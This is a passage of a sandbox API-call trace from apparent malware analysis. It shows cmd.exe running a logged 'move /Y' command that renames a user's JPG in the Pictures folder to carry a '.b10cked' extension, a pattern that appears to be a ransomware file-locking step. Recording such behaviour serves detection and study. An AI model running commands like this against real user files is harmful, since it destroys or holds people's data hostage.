RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0146.021] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30f83c, dwLength=0x1c | out: lpBuffer=0x30f83c*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0146.021] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30f83c, dwLength=0x1c | out: lpBuffer=0x30f83c*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.021] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30f83c, dwLength=0x1c | out: lpBuffer=0x30f83c*(BaseAddress=0x310000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xe0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0146.021] GetConsoleOutputCP () returned 0x1b5 [0146.021] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.021] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0146.021] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.021] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0146.021] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.021] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0146.021] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.021] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0146.022] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.022] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0146.022] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.022] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0146.022] GetEnvironmentStringsW () returned 0x400178* [0146.022] FreeEnvironmentStringsW (penv=0x400178) returned 1 [0146.022] GetEnvironmentStringsW () returned 0x400178* [0146.022] FreeEnvironmentStringsW (penv=0x400178) returned 1 
[0146.022] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e7dc | out: phkResult=0x30e7dc*=0x40) returned 0x0 [0146.022] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x0, lpData=0x30e7e8*=0xa0, lpcbData=0x30e7e0*=0x1000) returned 0x2 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x4, lpData=0x30e7e8*=0x1, lpcbData=0x30e7e0*=0x4) returned 0x0 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x0, lpData=0x30e7e8*=0x1, lpcbData=0x30e7e0*=0x1000) returned 0x2 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x4, lpData=0x30e7e8*=0x0, lpcbData=0x30e7e0*=0x4) returned 0x0 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x4, lpData=0x30e7e8*=0x40, lpcbData=0x30e7e0*=0x4) returned 0x0 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x4, lpData=0x30e7e8*=0x40, lpcbData=0x30e7e0*=0x4) returned 0x0 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x0, lpData=0x30e7e8*=0x40, lpcbData=0x30e7e0*=0x1000) returned 0x2 [0146.023] RegCloseKey (hKey=0x40) returned 0x0 [0146.023] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e7dc | out: phkResult=0x30e7dc*=0x40) returned 0x0 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x0, lpData=0x30e7e8*=0x40, lpcbData=0x30e7e0*=0x1000) returned 0x2 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x4, lpData=0x30e7e8*=0x1, lpcbData=0x30e7e0*=0x4) returned 0x0 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x0, lpData=0x30e7e8*=0x1, lpcbData=0x30e7e0*=0x1000) returned 0x2 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x4, lpData=0x30e7e8*=0x0, lpcbData=0x30e7e0*=0x4) returned 0x0 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x4, lpData=0x30e7e8*=0x9, lpcbData=0x30e7e0*=0x4) returned 0x0 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x4, lpData=0x30e7e8*=0x9, lpcbData=0x30e7e0*=0x4) returned 0x0 [0146.023] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e7e4, lpData=0x30e7e8, lpcbData=0x30e7e0*=0x1000 | out: lpType=0x30e7e4*=0x0, lpData=0x30e7e8*=0x9, lpcbData=0x30e7e0*=0x1000) returned 0x2 [0146.023] RegCloseKey (hKey=0x40) returned 0x0 [0146.023] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886374 [0146.023] srand (_Seed=0x5b886374) [0146.023] 
GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked\"" [0146.023] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked\"" [0146.024] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.024] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4018d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0146.024] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0146.024] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0146.024] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.024] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0146.024] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0146.024] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0146.024] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0146.024] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0146.024] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0146.024] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0146.024] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0146.025] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0146.025] GetEnvironmentStringsW () returned 0x4022c8* [0146.025] 
FreeEnvironmentStringsW (penv=0x4022c8) returned 1 [0146.025] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.025] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.025] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0146.025] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0146.025] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0146.025] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0146.025] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0146.025] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0146.025] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0146.025] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0146.025] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f5a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.025] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f5a8, lpFilePart=0x30f5a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f5a4*="Desktop") returned 0x18 [0146.025] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0146.025] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f324 | out: lpFindFileData=0x30f324) returned 0x400008 [0146.026] FindClose (in: hFindFile=0x400008 | out: hFindFile=0x400008) returned 1 [0146.026] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f324 | out: lpFindFileData=0x30f324) returned 0x400008 [0146.026] FindClose (in: hFindFile=0x400008 | out: hFindFile=0x400008) returned 1 [0146.026] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f324 | out: lpFindFileData=0x30f324) returned 0x400008 [0146.026] FindClose (in: 
hFindFile=0x400008 | out: hFindFile=0x400008) returned 1 [0146.026] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0146.026] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0146.026] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0146.026] GetEnvironmentStringsW () returned 0x402ae8* [0146.027] FreeEnvironmentStringsW (penv=0x402ae8) returned 1 [0146.027] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.027] GetConsoleOutputCP () returned 0x1b5 [0146.027] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.027] GetUserDefaultLCID () returned 0x409 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f6e8, cchData=128 | out: lpLCData="0") returned 2 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f6e8, cchData=128 | out: lpLCData="0") returned 2 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f6e8, cchData=128 | out: lpLCData="1") returned 2 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0146.028] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0146.028] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0146.029] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0146.030] GetConsoleTitleW (in: lpConsoleTitle=0x3f08d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.030] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0146.030] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0146.030] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0146.030] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0146.031] _wcsicmp (_String1="move", _String2=")") returned 68 [0146.031] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0146.031] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0146.031] _wcsicmp (_String1="IF", _String2="move") returned -4 [0146.031] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0146.031] _wcsicmp (_String1="REM", _String2="move") returned 5 [0146.031] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0146.034] GetConsoleTitleW (in: lpConsoleTitle=0x30f3e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.260] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0146.260] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0146.260] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0146.260] 
_wcsicmp (_String1="move", _String2="TYPE") returned -7 [0146.260] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0146.260] _wcsicmp (_String1="move", _String2="CD") returned 10 [0146.260] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0146.260] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0146.260] _wcsicmp (_String1="move", _String2="REN") returned -5 [0146.260] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0146.260] _wcsicmp (_String1="move", _String2="SET") returned -6 [0146.260] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0146.260] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0146.260] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0146.260] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0146.260] _wcsicmp (_String1="move", _String2="MD") returned 11 [0146.260] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0146.260] _wcsicmp (_String1="move", _String2="RD") returned -5 [0146.260] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0146.260] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0146.260] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0146.260] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0146.260] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0146.260] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0146.260] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0146.260] _wcsicmp (_String1="move", _String2="VER") returned -9 [0146.260] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0146.260] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0146.260] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0146.260] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0146.260] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0146.260] _wcsicmp (_String1="move", _String2="START") returned -6 [0146.260] _wcsicmp (_String1="move", _String2="DPATH") 
returned 9 [0146.260] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0146.260] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0146.262] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0146.262] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0146.262] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f19c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f194, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f194*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", 
_MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0146.263] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0146.264] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0146.264] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0146.264] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0146.264] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0146.264] _wcsicmp (_String1="WO_IX7~1.JPG", _String2=".") returned 73 [0146.264] _wcsicmp (_String1="WO_IX7~1.JPG", _String2="..") returned 73 [0146.264] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\wo_ix7~1.jpg")) returned 0x20 [0146.264] GetCurrentDirectoryW (in: 
nBufferLength=0x104, lpBuffer=0x401e30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.264] SetErrorMode (uMode=0x0) returned 0x0 [0146.265] SetErrorMode (uMode=0x1) returned 0x0 [0146.265] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG", nBufferLength=0x104, lpBuffer=0x30eb24, lpFilePart=0x30eb0c | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG", lpFilePart=0x30eb0c*="WO_IX7~1.JPG") returned 0x26 [0146.265] SetErrorMode (uMode=0x0) returned 0x1 [0146.265] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures" (normalized: "c:\\users\\eebsym5\\pictures")) returned 0x13 [0146.265] _wcsicmp (_String1="WO_IX7~1.JPG", _String2=".") returned 73 [0146.265] _wcsicmp (_String1="WO_IX7~1.JPG", _String2="..") returned 73 [0146.265] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\wo_ix7~1.jpg")) returned 0x20 [0146.265] SetErrorMode (uMode=0x0) returned 0x0 [0146.265] SetErrorMode (uMode=0x1) returned 0x0 [0146.265] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG", nBufferLength=0x104, lpBuffer=0x30efa0, lpFilePart=0x30ed38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG", lpFilePart=0x30ed38*="WO_IX7~1.JPG") returned 0x26 [0146.265] SetErrorMode (uMode=0x0) returned 0x1 [0146.265] SetErrorMode (uMode=0x0) returned 0x0 [0146.265] SetErrorMode (uMode=0x1) returned 0x0 [0146.265] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x30f1a8, lpFilePart=0x30ed38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked", lpFilePart=0x30ed38*="wo_IX7FkjtTmLgs.jpg.b10cked") returned 0x35 [0146.265] SetErrorMode (uMode=0x0) returned 0x1 [0146.265] SetLastError (dwErrCode=0x0) [0146.265] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked" (normalized: 
"c:\\users\\eebsym5\\pictures\\wo_ix7fkjttmlgs.jpg.b10cked")) returned 0xffffffff [0146.266] GetLastError () returned 0x2 [0146.266] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x30e6b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e6b4) returned 0x3f0e50 [0146.266] FindNextFileW (in: hFindFile=0x3f0e50, lpFindFileData=0x30e6b4 | out: lpFindFileData=0x30e6b4) returned 0 [0146.266] GetLastError () returned 0x12 [0146.266] FindClose (in: hFindFile=0x3f0e50 | out: hFindFile=0x3f0e50) returned 1 [0146.267] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x401bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x401bd0) returned 0x3f0e50 [0146.268] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x30e94c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked", lpFilePart=0x0) returned 0x35 [0146.268] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg", nBufferLength=0x104, lpBuffer=0x30e94c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg", lpFilePart=0x0) returned 0x2d [0146.268] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\wo_ix7fkjttmlgs.jpg")) returned 0x20 [0146.268] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\wo_ix7fkjttmlgs.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\wo_ix7fkjttmlgs.jpg.b10cked"), dwFlags=0x3) returned 1 [0146.268] FindClose (in: hFindFile=0x3f0e50 | out: hFindFile=0x3f0e50) returned 1 [0146.268] _vsnwprintf (in: 
_Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x30e900 | out: _Buffer=" 1") returned 9 [0146.268] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.268] GetFileType (hFile=0x7) returned 0x2 [0146.269] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0146.269] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30e88c | out: lpMode=0x30e88c) returned 1 [0146.269] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.269] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x30e8c0 | out: lpConsoleScreenBufferInfo=0x30e8c0) returned 1 [0146.269] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0146.269] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x30e900 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0146.270] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x30e8e4, lpReserved=0x0 | out: 